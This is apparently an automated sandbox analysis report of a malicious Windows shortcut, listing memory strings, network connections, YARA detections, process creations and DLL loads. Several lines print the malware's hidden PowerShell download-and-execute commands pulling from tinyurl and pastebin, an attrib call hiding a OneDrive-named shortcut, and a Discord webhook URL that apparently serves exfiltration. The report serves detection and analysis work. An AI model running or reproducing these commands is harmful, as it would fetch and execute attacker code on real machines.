Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB73E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discord.com/
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACAEE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41E589000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41E59D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A37F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A382D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB62B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB73E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41FB1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4DB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB62B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F9E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4C83000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC60C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F10E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A43A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 0000000F.00000002.1991384443.00000246A43A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A43A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB105000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB767000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A3CDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.1775607526.0000012ADAF55000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1775607526.0000012ADB098000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB275000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC4DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EF9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFA4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A422D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4238000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACB2AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1746329088.0000012ACC578000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41F062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000004.00000002.1746329088.0000012ACC500000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1909172962.000001B41EFDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A42F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1991384443.00000246A4248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.10:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.10:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.10:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.10:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.10:49722 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_7756.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_2040.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_5024.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2040, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5024, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFEFEFA64_2_00007FF7BFEFEFA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFEFFD524_2_00007FF7BFEFFD52
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFF0C99C4_2_00007FF7BFF0C99C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFF0B1FA4_2_00007FF7BFF0B1FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFF0CA254_2_00007FF7BFF0CA25
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFF00EFA4_2_00007FF7BFF00EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFF00ED14_2_00007FF7BFF00ED1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF7BFEFEAA94_2_00007FF7BFEFEAA9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF7BFEDC71211_2_00007FF7BFEDC712
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF7BFEDB96611_2_00007FF7BFEDB966
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF7BFEE96D511_2_00007FF7BFEE96D5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF7BFEE7E7711_2_00007FF7BFEE7E77
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF7BFEE964C11_2_00007FF7BFEE964C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF7BFEDD1B111_2_00007FF7BFEDD1B1
Source: amsi64_7756.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_2040.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_5024.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7756, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2040, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5024, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal96.troj.evad.winLNK@20/15@5/5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvl0kj3x.5ut.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\forfiles.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT tinyurl.com/yeykydun -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dllJump to behavior
Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dllJump to behavior
Source: C:\Windows\System32\forfiles.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
